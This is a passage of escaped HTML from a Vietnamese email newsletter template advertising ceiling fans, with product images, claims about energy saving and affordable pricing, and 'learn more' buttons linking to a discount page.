<\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/quattranvn.com\\/giam-gia\\\" style=\\\"height:37px; v-text-anchor:middle; width:129px;\\\" arcsize=\\\"11%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#236fa1\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:helvetica,sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/quattranvn.com\\/giam-gia\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:helvetica,sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #236fa1; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">T\\u00ecm hi\\u1ec3u th\\u00eam<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"400\\\" style=\\\"background-color: #ecf0f1;width: 400px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 400px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681371524407-quat-tran-abacus-60-canh-go-than-mau-trang.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 380px;\\\" width=\\\"380\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 800px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:800px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"400\\\" style=\\\"background-color: #ecf0f1;width: 400px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 400px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px 33px 18px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: inherit; color: #444444; line-height: 200%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 200%;\\\"><span style=\\\"font-size: 16px; line-height: 32px;\\\"><strong>Ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n n\\u0103ng t\\u1ed1i \\u0111a<\\/strong><\\/span><\\/p>\\r\\n<p style=\\\"line-height: 200%;\\\">\\u201d Con \\u00e1t ch\\u1ee7 b\\u00e0i \\u201d tung ra \\u0111\\u1ec3 PR cho m\\u1eabu s\\u1ea3n ph\\u1ea9m \\u0111\\u00f3 l\\u00e0 n\\u0103ng l\\u1ef1c ti\\u1ebft ki\\u1ec7m ng\\u00e2n s\\u00e1ch v\\u00e0 chi ph\\u00ed \\u0111i\\u1ec7n v\\u00e0 h\\u00e3ng \\u0111\\u00e3 kh\\u00f4ng l\\u00e0m ng\\u01b0\\u1eddi d\\u00f9ng tuy\\u1ec7t v\\u1ecdng. Ch\\u1ec9 mang hi\\u1ec7u su\\u1ea5t 35W, d\\u00f2ng qu\\u1ea1t s\\u1edf h\\u1eefu n\\u0103ng l\\u1ef1c ti\\u1ebft ki\\u1ec7m chi ph\\u00ed \\u0111i\\u1ec7n t\\u1ed1t nh\\u1ea5t.<\\/p>\\r\\n<p style=\\\"line-height: 200%;\\\">B\\u1ea1n ho\\u00e0n to\\u00e0n c\\u00f3 th\\u1ec3 t\\u1ef1 do s\\u1eed d\\u1ee5ng qu\\u1ea1t tr\\u1ea7n m\\u00e0 kh\\u00f4ng c\\u1ea7n lo ng\\u1ea1i v\\u1ec1 \\u0111i\\u1ec7n n\\u0103ng m\\u1ed7i th\\u00e1ng.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/quattranvn.com\\/giam-gia\\\" style=\\\"height:37px; v-text-anchor:middle; width:129px;\\\" arcsize=\\\"11%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#236fa1\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:helvetica,sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/quattranvn.com\\/giam-gia\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:helvetica,sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #236fa1; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">T\\u00ecm hi\\u1ec3u th\\u00eam<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"400\\\" style=\\\"background-color: #ecf0f1;width: 400px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 400px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681371643116-quat-tran-katrina-52-gray-maple-wood.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 380px;\\\" width=\\\"380\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 800px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:800px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"400\\\" style=\\\"background-color: #ecf0f1;width: 400px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 400px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:28px 33px 18px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: inherit; font-size: 14px; color: #444444; line-height: 200%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 200%;\\\"><span style=\\\"font-size: 16px; line-height: 28px;\\\"><strong>Gi\\u00e1 c\\u1ea3 ph\\u1ea3i ch\\u0103ng<\\/strong><\\/span><\\/p>\\r\\n<p style=\\\"line-height: 200%;\\\">Gi\\u00e1 th\\u00e0nh lu\\u00f4n l\\u00e0 y\\u1ebfu t\\u1ed1 then ch\\u1ed1t \\u0111\\u1ec3 quy\\u1ebft \\u0111\\u1ecbnh. HAMILTON AIR \\u0111\\u01b0\\u1ee3c \\u0111i\\u1ec3m v\\u1edbi gi\\u00e1 ti\\u1ec1n h\\u00e0i h\\u00f2a v\\u00e0 h\\u1ee3p l\\u00fd v\\u1edbi ch\\u1ea5t l\\u01b0\\u1ee3ng, t\\u01b0\\u01a1ng th\\u00edch v\\u1edbi ng\\u01b0\\u1eddi ti\\u00eau d\\u00f9ng Vi\\u1ec7t.<\\/p>\\r\\n<p style=\\\"line-height: 200%;\\\">\\u0110\\u00e2y th\\u1ef1c s\\u1ef1 l\\u00e0 t\\u00ean th\\u01b0\\u01a1ng hi\\u1ec7u qu\\u1ea1t m\\u00e0 b\\u1ea1n n\\u00ean chi\\u1ebfm h\\u1eefu cho kho\\u1ea3ng tr\\u1ed1ng s\\u1ed1ng c\\u1ee7a m\\u00e1i \\u1ea5m gia \\u0111\\u00ecnh m\\u00ecnh.<\\/p>\\r\\n<p style=\\\"line-height: 200%;\\\">C\\u00e1c ki\\u1ec3u qu\\u1ea1t tr\\u1ea7n \\u0111ang gi\\u1ea3m gi\\u00e1 l\\u00ean \\u0111\\u1ebfn 20%<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/quattranvn.com\\/giam-gia\\\" style=\\\"height:37px; v-text-anchor:middle; width:129px;\\\" arcsize=\\\"11%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#236fa1\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:helvetica,sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/quattranvn.com\\/giam-gia\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:helvetica,sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #236fa1; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">T\\u00ecm hi\\u1ec3u th\\u00eam<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"400\\\" style=\\\"background-color: #ecf0f1;width: 400px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 400px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681371587605-nexus-60.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 380px;\\\" width=\\\"380\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 800px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:800px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"800\\\" style=\\\"background-color: #ecf0f1;width: 800px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 800px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: inherit; font-size: 22px; font-weight: 700; color: #3d3434; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">Tổ chức đào tạo WIT Bring the Best Value and Auto Comfort<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td 